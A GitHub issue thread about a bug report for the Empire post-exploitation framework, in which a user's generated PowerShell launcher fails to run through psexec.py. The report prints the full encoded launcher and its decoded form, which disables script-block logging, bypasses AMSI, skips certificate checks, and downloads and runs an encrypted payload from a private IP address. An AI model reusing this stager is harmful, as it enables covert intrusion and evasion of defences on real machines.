### ISSUE TITLE
Powershell Launcher Generation Bug

### ISSUE THREAD

**Issue by Green-Wolf** [EmpireProject/Empire#1063]
## Empire Version
2.5 

## OS Information (Linux flavor, Python version)
Generated command on Kali, Running command on Windows 7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
I set up an empire http listener called 'test' and generate an encoded powershell command with "launcher powershell test". It generates this command:
`powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBpAG8ATgBUAEEAYgBMAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AQQBKAG8AUgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAEYAXQAuAEEAUwBzAEUAbQBCAEwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAGkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAEEATABVAEUAKAAkAE4AVQBMAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBsAD0AWwBDAE8AbABMAGUAQwBUAEkAbwBuAFMALgBHAGUAbgBFAFIASQBjAC4ARABpAEMAdABpAG8AbgBBAFIAWQBbAFMAVAByAEkATgBnACwAUwB5AFMAVABFAG0ALgBPAEIASgBlAEMAVABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBhAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEAbAB9AEUATABTAEUAewBbAFMAYwByAEkAcABUAEIATABPAGMASwBdAC4AIgBHAGUAdABGAEkAZQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBlACgAJABuAFUATABsACwAKABOAGUAdwAtAE8AYgBKAGUAQwB0ACAAQwBPAEwAbABFAEMAdABJAG8ATgBzAC4ARwBFAG4AZQByAGkAYwAuAEgAQQBzAGgAUwBFAHQAWwBzAFQAcgBpAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAEUATQBiAGwAeQAuAEcARQBUAFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAFQARgBJAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEATABVAEUAKAAkAG4AVQBMAEwALAAkAHQAcgB1AGUAKQB9ADsAfQA7AFsAUwB5AHMAVABlAG0ALgBOAGUAVAAuAFMARQBSAFYAaQBDAGUAUABPAGkATgB0AE0AQQBOAGEARwBlAFIAXQA6ADoARQB4AHAARQBDAHQAMQAwADAAQwBPAG4AdABJAG4AVQBlAD0AMAA7ACQAVwBDAD0ATgBFAHcALQBPAGIAagBlAGMAdAAgAFMAWQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAYgBDAGwASQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAJABXAGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AEMALgBQAHIATwB4AHkAPQBbAFMAWQBzAHQAZQBNAC4ATgBlAFQALgBXAGUAYgBSAGUAUQBVAEUAUwBUAF0AOgA6AEQAZQBGAGEAdQBsAHQAVwBlAEIAUAByAG8AeABZADsAJAB3AEMALgBQAFIATwB4AFkALgBDAHIAZQBEAEUATgB0AEkAQQBsAHMAIAA9ACAAWwBTAHkAcwBUAEUATQAuAE4ARQBUAC4AQwBSAGUAZABlAE4AdABpAGEAbABDAGEAYwBIAEUAXQA6ADoARABFAEYAYQB1AEwAVABOAEUAVAB3AE8AcgBLAEMAcgBlAGQAZQBuAFQAaQBhAEwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAFQAZQBNAC4AVABlAHgAVAAuAEUATgBjAG8AZABpAE4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAFkAdABlAHMAKAAnAGoATgB0AE8AKwBlADgAMQBmAFEAfQA9AEwAIQBJAEoAIwBxADwAeQBNAFkAbgBCAEcAKQBwAEQAeAA6AHUALgAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAHgAbwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHMAZQByAD0AJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4ANgAuADAALgAyADMANgA6ADgAMAAnADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJABXAEMALgBIAEUAQQBEAGUAcgBTAC4AQQBEAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQBrAGYASgA5ADUALwB4AGIALwBvAEQATwAwAGsAWABEADEAWABqAHQAMwA5AHUAQQBRAEIAVQA9ACIAKQA7ACQARABhAHQAYQA9ACQAVwBDAC4ARABPAFcATgBsAG8AYQBkAEQAQQBUAEEAKAAkAHMAZQByACsAJAB0ACkAOwAkAEkAVgA9ACQARABBAFQAYQBbADAALgAuADMAXQA7ACQARABhAHQAYQA9ACQAZABhAHQAYQBbADQALgAuACQARABhAFQAQQAuAEwAZQBOAEcAdABIAF0AOwAtAGoAbwBJAG4AWwBDAGgAQQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA`

I then try to run it on the target machine by copy and pasting it into a psexec.py terminal, and i get the following error:
```
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">Missing closing '}' in statement block._x000D__x000A_</S><S S="Error">At line:1 char:1525_x000D__x000A_</S><S S="Error">+ If($PSVeRSioNTAbLE.PSVErsION.MAJoR -ge 3){$GPF=[REF].ASsEmBLY.GeTTYpe('System_x000D__x000A_</S><S S="Error">.Management.Automation.Utils')."GeTFiE`Ld"('cachedGroupPolicySettings','N'+'onP_x000D__x000A_</S><S S="Error">ublic,Static');If($GPF){$GPC=$GPF.GetVALUE($NULl);If($GPC['ScriptB'+'lockLoggin_x000D__x000A_</S><S S="Error">g']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['Scrip_x000D__x000A_</S><S S="Error">tB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$Val=[COlLeCTIonS.Ge_x000D__x000A_</S><S S="Error">nERIc.DiCtionARY[STrINg,SySTEm.OBJeCT]]::nEW();$val.ADd('EnableScriptB'+'lockLo_x000D__x000A_</S><S S="Error">gging',0);$vAL.ADD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MAC_x000D__x000A_</S><S S="Error">HINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VA_x000D__x000A_</S><S S="Error">l}ELSE{[ScrIpTBLOcK]."GetFIe`Ld"('signatures','N'+'onPublic,Static').SetVALUe($_x000D__x000A_</S><S S="Error">nULl,(New-ObJeCt COLlECtIoNs.GEneric.HAshSEt[sTriNg]))}[Ref].ASSEMbly.GETTyPE('_x000D__x000A_</S><S S="Error">System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GETFIeLd('amsiInitFailed','_x000D__x000A_</S><S S="Error">NonPublic,Static').SeTVALUE($nULL,$true)};};[SysTem.NeT.SERViCePOiNtMANaGeR]::E_x000D__x000A_</S><S S="Error">xpECt100COntInUe=0;$WC=NEw-Object SYsTeM.NET.WebClIENT;$u='Mozilla/5.0 (Windows_x000D__x000A_</S><S S="Error"> NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManag_x000D__x000A_</S><S S="Error">er]::ServerCertificateValidationCallback = {$true};$Wc.Headers.Add('User-Agent'_x000D__x000A_</S><S S="Error">,$u);$wC.PrOxy=[SYsteM.NeT.WebReQUEST]::DeFaultWeBProxY;$wC.PROxY.CreDENtIAls =_x000D__x000A_</S><S S="Error"> [SysTEM.NET.CRedeNtialCacHE]::DEFauLTNETwOrKCredenTiaLs;$Script:Proxy = $wc.Pr_x000D__x000A_</S><S S="Error">oxy;$K=[SysTeM.TexT.ENcodiNg]::ASCII.GetBYtes('jNtO+e81fQ}=L!IJ#q&lt;yMYnBG)pDx:u._x000D__x000A_</S><S S="Error">');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CouNT])%256;$S[$_]_x000D__x000A_</S><S S="Error">,$S[$J]=$S[$J],$S[$_]};$D &lt;&lt;&lt;&lt; _x000D__x000A_</S><S S="Error">    + CategoryInfo          : ParserError: (CloseBraceToken:TokenId) [], Paren _x000D__x000A_</S><S S="Error">   tContainsErrorRecordException_x000D__x000A_</S><S S="Error">    + FullyQualifiedErrorId : MissingEndCurlyBrace_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>
```

## Aadditional information
I ran the encoded command through a base64 decoder to have a look at it and there seems to be a mismatch in the number of curly brackets {,10 and },11. It may be something else as i don't fully understand all of this powershell, but it could be a start, either too many } or too few {:
```
If($PSVeRSioNTAbLE.PSVErsION.MAJoR -ge 3){
	$GPF=[REF].ASsEmBLY.GeTTYpe('System.Management.Automation.Utils')."GeTFiE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');
	If($GPF){
		$GPC=$GPF.GetVALUE($NULl);
		If($GPC['ScriptB'+'lockLogging']){
			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
			$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0
		}
		$Val=[COlLeCTIonS.GenERIc.DiCtionARY[STrINg,SySTEm.OBJeCT]]::nEW();
		$val.ADd('EnableScriptB'+'lockLogging',0);
		$vAL.ADD('EnableScriptBlockInvocationLogging',0);
		$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl
	}
	ELSE{
		[ScrIpTBLOcK]."GetFIe`Ld"('signatures','N'+'onPublic,Static').SetVALUe($nULl,(New-ObJeCt COLlECtIoNs.GEneric.HAshSEt[sTriNg]))
	}
	[Ref].ASSEMbly.GETTyPE('System.Management.Automation.AmsiUtils')|?{
		$_
	}
|%{
	$_.GETFIeLd('amsiInitFailed','NonPublic,Static').SeTVALUE($nULL,$true)
};
};
[SysTem.NeT.SERViCePOiNtMANaGeR]::ExpECt100COntInUe=0;
$WC=NEw-Object SYsTeM.NET.WebClIENT;
$u='Mozilla/5.0 (Windows NT 6.1;
 WOW64;
 Trident/7.0;
 rv:11.0) like Gecko';
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$Wc.Headers.Add('User-Agent',$u);
$wC.PrOxy=[SYsteM.NeT.WebReQUEST]::DeFaultWeBProxY;
$wC.PROxY.CreDENtIAls = [SysTEM.NET.CRedeNtialCacHE]::DEFauLTNETwOrKCredenTiaLs;
$Script:Proxy = $wc.Proxy;
$K=[SysTeM.TexT.ENcodiNg]::ASCII.GetBYtes('jNtO+e81fQ}=L!IJ#q<yMYnBG)pDx:u.');
$R={
	$D,$K=$ARGs;
	$S=0..255;
	0..255|%{
		$J=($J+$S[$_]+$K[$_%$K.CouNT])%256;
		$S[$_],$S[$J]=$S[$J],$S[$_]
	};
	$D|%{
		$I=($I+1)%256;
		$H=($H+$S[$I])%256;
		$S[$I],$S[$H]=$S[$H],$S[$I];
		$_-BxoR$S[($S[$I]+$S[$H])%256]
	}
};
$ser='https://10.6.0.236:80';
$t='/news.php';
$WC.HEADerS.ADD("Cookie","session=kfJ95/xb/oDO0kXD1Xjt39uAQBU=");
$Data=$WC.DOWNloadDATA($ser+$t);
$IV=$DATa[0..3];
$Data=$data[4..$DaTA.LeNGtH];
-joIn[ChAr[]](& $R $data ($IV+$K))|IEX
```

**Comment by xorrior** [comment]
@Green-Wolf Can you reproduce this issue if you execute the launcher in a powershell or command prompt? I don't have this issue in either case. I also looked at the decoded launcher you posted here in visual studio code. All of the brackets match up. Could this be attributed to executing the launcher with psexec.py?

**Comment by Green-Wolf** [comment]
I think this was actually a problem with power shell on the target machines, so i'll go ahead and close it.
